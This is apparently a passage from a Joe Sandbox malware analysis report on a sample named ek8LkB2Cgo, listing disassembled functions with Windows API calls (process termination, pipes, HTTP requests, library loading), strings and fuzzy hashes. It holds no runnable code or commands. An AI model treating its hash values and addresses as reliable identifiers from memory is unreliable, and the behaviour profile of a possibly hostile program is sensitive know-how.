                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00537C1D
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00537C2C
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C3B
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C45
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: 6b2139014f1ab6de2b3ffa5764b0298957548ba6cf7a6b8963421673ae637120
                                                                                  • Instruction ID: 830af8c3d060346433d068c556f240cfa710836930e3fc7dd06fa33078a4ca2c
                                                                                  • Opcode Fuzzy Hash: 6b2139014f1ab6de2b3ffa5764b0298957548ba6cf7a6b8963421673ae637120
                                                                                  • Instruction Fuzzy Hash: 3DF03A72241158BBE7215B52AC0EEEF7F7CEFDAB11F000028FA0A91051D7A05A89F6B5
                                                                                  Function 00539A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00539A33
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A44
                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A51
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A5E
                                                                                    • Part of subcall function 005393D1: CloseHandle.KERNEL32(?,?,00539A6B,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 005393DB
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00539A71
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 99a7a62115eb04993f525367da9794e879e195b04c7cf1a0a4359d69ccfa5adc
                                                                                  • Instruction ID: 646420237836167cad2e0d20f8ab8cb86c39e35598291cd03b53402bd0bee338
                                                                                  • Opcode Fuzzy Hash: 99a7a62115eb04993f525367da9794e879e195b04c7cf1a0a4359d69ccfa5adc
                                                                                  • Instruction Fuzzy Hash: F6F0BE7A141201ABD3111BA4FC8CDAB3B3AFF94301F040421F107A10B1DBB59846FB70
                                                                                  Function 004F1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
                                                                                    • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                  • __swprintf.LIBCMT ref: 004F1EA6
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004F1D49
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 2125237772-557222456
                                                                                  • Opcode ID: 5c36fed9c41fc3b96fd07f86e17fd43ecf1bae625baed9921afce9a6fbba504a
                                                                                  • Instruction ID: ce7f0d3bcbd0f4321fbcfb614e8246efb07b0201975c7c6c16e814b4a046c949
                                                                                  • Opcode Fuzzy Hash: 5c36fed9c41fc3b96fd07f86e17fd43ecf1bae625baed9921afce9a6fbba504a
                                                                                  • Instruction Fuzzy Hash: 63916B721042099FCB24EF25C995C7EBBE4BF95704F00491EFA86972A1DB74ED04CB96
                                                                                  Function 0054AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054B006
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 0054B115
                                                                                  • VariantClear.OLEAUT32(?), ref: 0054B298
                                                                                    • Part of subcall function 00539DC5: VariantInit.OLEAUT32(00000000), ref: 00539E05
                                                                                    • Part of subcall function 00539DC5: VariantCopy.OLEAUT32(?,?), ref: 00539E0E
                                                                                    • Part of subcall function 00539DC5: VariantClear.OLEAUT32(?), ref: 00539E1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4237274167-1221869570
                                                                                  • Opcode ID: 87cfd1a7423f696e92273b7d2bc03c280af85473befc7941ff1484437f451a9f
                                                                                  • Instruction ID: ac8a0210b2701debf207f9ae6f44bebbf182160e14fa7fb5451348227e067a8d
                                                                                  • Opcode Fuzzy Hash: 87cfd1a7423f696e92273b7d2bc03c280af85473befc7941ff1484437f451a9f
                                                                                  • Instruction Fuzzy Hash: 92916C746083059FCB10DF24D4859AEBBF4BF89708F04486EF99A9B3A1DB31E945CB52
                                                                                  Function 00535347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • _memset.LIBCMT ref: 00535438
                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00535467
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00535513
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0053553D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                  • String ID: 0
                                                                                  • API String ID: 4152858687-4108050209
                                                                                  • Opcode ID: b87dcdcc4d91cf282437be3d8f753a07c58d15c7350dc7d78140ec20adbac8d1
                                                                                  • Instruction ID: 10d3177511be6655b0e3512b1ed0f91386a58c20597fc864bf87c4a281d1ceab
                                                                                  • Opcode Fuzzy Hash: b87dcdcc4d91cf282437be3d8f753a07c58d15c7350dc7d78140ec20adbac8d1
                                                                                  • Instruction Fuzzy Hash: 3B51F072104B019BD7159F28C8456BBBFE8FF85354F142A2EF896D3190FBA0ED448B52
                                                                                  Function 00530213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0053027B
                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005302B1
                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005302C2
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00530344
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                  • String ID: DllGetClassObject
                                                                                  • API String ID: 753597075-1075368562
                                                                                  • Opcode ID: 5a0a16d3bb380b80a04c1dd86325c1e740093ed9597abe5a9139227ab7ad45e1
                                                                                  • Instruction ID: c759e6f018778d39f46036f0db0401ddb40f9bc7e3bd1e4c5a18fa0e66493994
                                                                                  • Opcode Fuzzy Hash: 5a0a16d3bb380b80a04c1dd86325c1e740093ed9597abe5a9139227ab7ad45e1
                                                                                  • Instruction Fuzzy Hash: 46416AB1600304EFDB05CF54C8A5B9A7FB9FF84310F1494A9A9099F286D7B1DA44DBA1
                                                                                  Function 00535007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00535075
                                                                                  • GetMenuItemInfoW.USER32 ref: 00535091
                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 005350D7
                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005B1708,00000000), ref: 00535120
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1173514356-4108050209
                                                                                  • Opcode ID: f8bb20999967808bac87a51a52c7068ad00badcf54064a14a9187b4cfc003396
                                                                                  • Instruction ID: 5fba02eb8991001b8f04f32634cd15e16350a1b39afa9883d19a2018be4eda86
                                                                                  • Opcode Fuzzy Hash: f8bb20999967808bac87a51a52c7068ad00badcf54064a14a9187b4cfc003396
                                                                                  • Instruction Fuzzy Hash: 9241C2752047029FD720DF24D884B6ABBE4BF85324F145A1EF99597291E730E944CB62
                                                                                  Function 00550567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00550587
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower
                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                  • API String ID: 2358735015-567219261
                                                                                  • Opcode ID: d1b7e4ebb6e84bac9a394f2183af474042005142236b59af33a2390bee88ace7
                                                                                  • Instruction ID: 2384d52207522b6682f2e355e8cb96382cbe92c30cbbd3ecba688521f707c740
                                                                                  • Opcode Fuzzy Hash: d1b7e4ebb6e84bac9a394f2183af474042005142236b59af33a2390bee88ace7
                                                                                  • Instruction Fuzzy Hash: 2431B47050011AAFCF00EF54C9519FEBBB4FF55314B104A2EE825A72D1DB71E915CB90
                                                                                  Function 0052B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0052B88E
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0052B8A1
                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 0052B8D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: a70a978de7150e22d72619c6095e67e87482c883f77081cb3bb74a0cda3bfac4
                                                                                  • Instruction ID: 0191f6b81e4ab5fe5d035282282f8cff0e96ab1f4085d8f7ed32ecfa6e519296
                                                                                  • Opcode Fuzzy Hash: a70a978de7150e22d72619c6095e67e87482c883f77081cb3bb74a0cda3bfac4
                                                                                  • Instruction Fuzzy Hash: DE21F376A00108BFEB14AB64EC86DFE7BBCEF46354B10412DF529A31E1DB785D0A9760
                                                                                  Function 005443E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00544401
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00544427
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00544457
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0054449E
                                                                                    • Part of subcall function 00545052: GetLastError.KERNEL32(?,?,005443CC,00000000,00000000,00000001), ref: 00545067
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                  • String ID:
                                                                                  • API String ID: 1951874230-3916222277
                                                                                  • Opcode ID: 479fc0efdd6e02d6491ae5d796d4caa73fa28897ee926502e527e49336ad80cc
                                                                                  • Instruction ID: 852c56db7bedff0cd7fc306e2c25fae9f1fec34e8c9494e4c91b4727804e6385
                                                                                  • Opcode Fuzzy Hash: 479fc0efdd6e02d6491ae5d796d4caa73fa28897ee926502e527e49336ad80cc
                                                                                  • Instruction Fuzzy Hash: 5C21AFB5540608BFEB119F649C89FFFBAFCFF88758F10841AF109A2140EA648D45AB70
                                                                                  Function 005590E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                    • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                    • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0055915C
                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00559163
                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00559178
                                                                                  • DestroyWindow.USER32(?), ref: 00559180
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 4146253029-1011021900
                                                                                  • Opcode ID: 2e0fdbf260d14ba9bad8c6b150be797b5cf719e337a6b166fb5dcdf538e5012e
                                                                                  • Instruction ID: d67e2d38ed1beee11524ee8761e16d0fbc9990c11faf91e17823e20ce9a88ea8
                                                                                  • Opcode Fuzzy Hash: 2e0fdbf260d14ba9bad8c6b150be797b5cf719e337a6b166fb5dcdf538e5012e
                                                                                  • Instruction Fuzzy Hash: CB218E71200616FBEF104E649CA8EFA3BB9FF99365F10061AFD1492190C779DC49E760
                                                                                  Function 00539568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00539588
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005395B9
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 005395CB
                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00539605
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: b0e656bb983d0f79eeee037c95c8eae0a28a660a1a4e2163677b552db63822db
                                                                                  • Instruction ID: 8792228767842e28309fb03065a4309c6ceb66f1a64947c1225b8ccbada262f0
                                                                                  • Opcode Fuzzy Hash: b0e656bb983d0f79eeee037c95c8eae0a28a660a1a4e2163677b552db63822db
                                                                                  • Instruction Fuzzy Hash: 542192B1500206ABEB219F25DC05A9E7FF4BF95720F204A19F8A5D72D0D7B0D985DF20
                                                                                  Function 00539634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00539653
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00539683
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00539694
                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005396CE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: 1185618a6f03514b6d45b4fb0910c6b61da192dd90474b597b2610732eb993f9
                                                                                  • Instruction ID: 8c68f025df25902db7018170b1daa688f128644c018d2f536f23f0be9aadfd54
                                                                                  • Opcode Fuzzy Hash: 1185618a6f03514b6d45b4fb0910c6b61da192dd90474b597b2610732eb993f9
                                                                                  • Instruction Fuzzy Hash: A72183B15012069BDB209F699C46E9ABBF8BF95734F200A19F8A1E72D0D7F0D845DB60
                                                                                  Function 0053DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053DB0A
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0053DB5E
                                                                                  • __swprintf.LIBCMT ref: 0053DB77
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0058DC00), ref: 0053DBB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                  • String ID: %lu
                                                                                  • API String ID: 3164766367-685833217
                                                                                  • Opcode ID: 48741b93212bfca9c6939c746c6fa77335aeb0207bc96af89cdd4834b4f413d5
                                                                                  • Instruction ID: 0423fcc123cba119ca75cb09c1336e13c170231a7aa27961a9af8649efce2497
                                                                                  • Opcode Fuzzy Hash: 48741b93212bfca9c6939c746c6fa77335aeb0207bc96af89cdd4834b4f413d5
